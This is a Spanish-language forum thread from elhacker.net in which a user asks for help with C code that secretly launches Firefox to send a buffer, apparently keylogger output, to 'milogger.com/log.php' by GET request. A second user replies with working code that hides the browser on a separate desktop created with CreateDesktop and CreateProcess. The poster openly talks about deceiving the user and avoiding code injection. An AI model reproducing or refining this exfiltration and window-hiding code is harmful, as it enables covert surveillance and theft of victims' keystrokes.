elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Usando Git para manipular el directorio de trabajo, el índice y commits (segunda parte)


+  Foro de elhacker.net
|-+  Programación
| |-+  Programación C/C++ (Moderadores: Eternal Idol, Littlehorse, K-YreX)
| | |-+  Problemas con ShellExecute
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Problemas con ShellExecute  (Leído 2,090 veces)
someRandomCode

Desconectado Desconectado

Mensajes: 250



Ver Perfil
Problemas con ShellExecute
« en: 28 Noviembre 2012, 09:57 am »

Código:
int EnviarAMi() {
/* Busco si existe un navegador*/
static char navegador[1024];
HINSTANCE envio;
HANDLE Navegador = CreateFile("C:\\Program Files (x86)\\Mozilla Firefox\\firefox.exe",
GENERIC_READ,
0,
NULL,
OPEN_EXISTING,
FILE_ATTRIBUTE_NORMAL,
NULL);
if (Navegador!=INVALID_HANDLE_VALUE) {
strcpy(navegador,"""C:\\Program Files (x86)\\Mozilla Firefox\\firefox.exe""");
strcat(navegador," www.milogger.com/log.php?");
strcat(navegador,buffer);
/* Lanzar navegador */
envio = ShellExecute(NULL,"open",navegador,NULL,NULL,0);
if ((int)envio>31)
printf("Navegador lanzado oculto");
}

Alguien sabe porque no esta funcionando?


En línea

x64core


Desconectado Desconectado

Mensajes: 1.908


Ver Perfil
Re: Problemas con ShellExecute
« Respuesta #1 en: 28 Noviembre 2012, 11:30 am »

ShellExecute:

ShellExecute(NULL,"open",navegador,URL,NULL,NULL);


En línea

someRandomCode

Desconectado Desconectado

Mensajes: 250



Ver Perfil
Re: Problemas con ShellExecute
« Respuesta #2 en: 28 Noviembre 2012, 11:43 am »

Gracias, pero si pongo el ultimo NULL me abre el navegador en modo visible, la idea es que lo haga como SW_HIDDEN (0)...
Por el resto pense que no seria cambio, pero si lo hizo al cambio..
El problema es que si tiene un navegador abierto (una instancia de firefox) me habre una pestaña..
supongo que podria engañar al usuario abriendo una pestaña con Google..
En línea

x64core


Desconectado Desconectado

Mensajes: 1.908


Ver Perfil
Re: Problemas con ShellExecute
« Respuesta #3 en: 29 Noviembre 2012, 08:08 am »

Gracias, pero si pongo el ultimo NULL me abre el navegador en modo visible, la idea es que lo haga como SW_HIDDEN (0)...
Por el resto pense que no seria cambio, pero si lo hizo al cambio..
El problema es que si tiene un navegador abierto (una instancia de firefox) me habre una pestaña..
supongo que podria engañar al usuario abriendo una pestaña con Google..

con SW_HIDDEN  no vas a poder ocultar a firefox.
si lo que quieres es ocultar la ventana del proces del navegador entonces tendras que crearte una instance de un nuevo escritorio
para poder mostrarlo solo en el escritorio que has creado ( utilizando: CreateDesktop ). luego pasando el mismo nombre del
nuevo escritorio y utlizando CreateProcess:

Código
  1.     STARTUPINFO              SI;
  2.     PROCESS_INFORMATION      PI;
  3.     HANDLE nDekt;
  4.     memset(&SI, 0, sizeof(SI));
  5.     memset(&PI, 0, sizeof(PI));
  6.  
  7.     SI.cb = sizeof(SI);
  8.     SI.lpDesktop = "newDesktop";
  9.  
  10.     if(nDekt = CreateDesktop("newDesktop",0,0,0,GENERIC_ALL,0))
  11.     {
  12.  
  13.          CreateProcess( "C:\\Program Files (x86)\\Mozilla Firefox\\firefox.exe",
  14.                         "www.google.com",                
  15.                         0,
  16.                         0,
  17.                         0,
  18.                         DETACHED_PROCESS,
  19.                         0,
  20.                         0,                              
  21.                         &SI,
  22.                         &PI);
  23.  
  24.     }
  25.     return 0;


con eso ocultas cualquier ventana de cualquier  ::)


PD_ no olvidar cerrar el handle al objeto.
« Última modificación: 29 Noviembre 2012, 08:14 am por RHL » En línea

someRandomCode

Desconectado Desconectado

Mensajes: 250



Ver Perfil
Re: Problemas con ShellExecute
« Respuesta #4 en: 29 Noviembre 2012, 11:15 am »

Barbaro me viene genial, porque la idea es evitar tener que lidiar con injectar codigo y pasar el log por GET de a pedacitos..
En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
* [Source] ShellExecute sin declaracion api
Programación Visual Basic
BlackZeroX 1 2,190 Último mensaje 14 Enero 2010, 11:08 am
por Karcrack
problema con shellexecute escondido
Programación Visual Basic
50l3r 6 2,518 Último mensaje 22 Marzo 2010, 14:03 pm
por 50l3r
no consigo hacer funcionar a shellexecute.
Programación C/C++
black_flowers 1 4,033 Último mensaje 29 Marzo 2011, 13:03 pm
por d(-_-)b
ShellExecute Failed Windows 7 sobre raiz SO notepad++
Programación General
Graphixx 0 2,335 Último mensaje 22 Junio 2011, 00:37 am
por Graphixx
Ejecutar comand DOS con ShellExecute?
Programación C/C++
t4r0x 1 1,016 Último mensaje 27 Octubre 2016, 15:22 pm
por fary
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines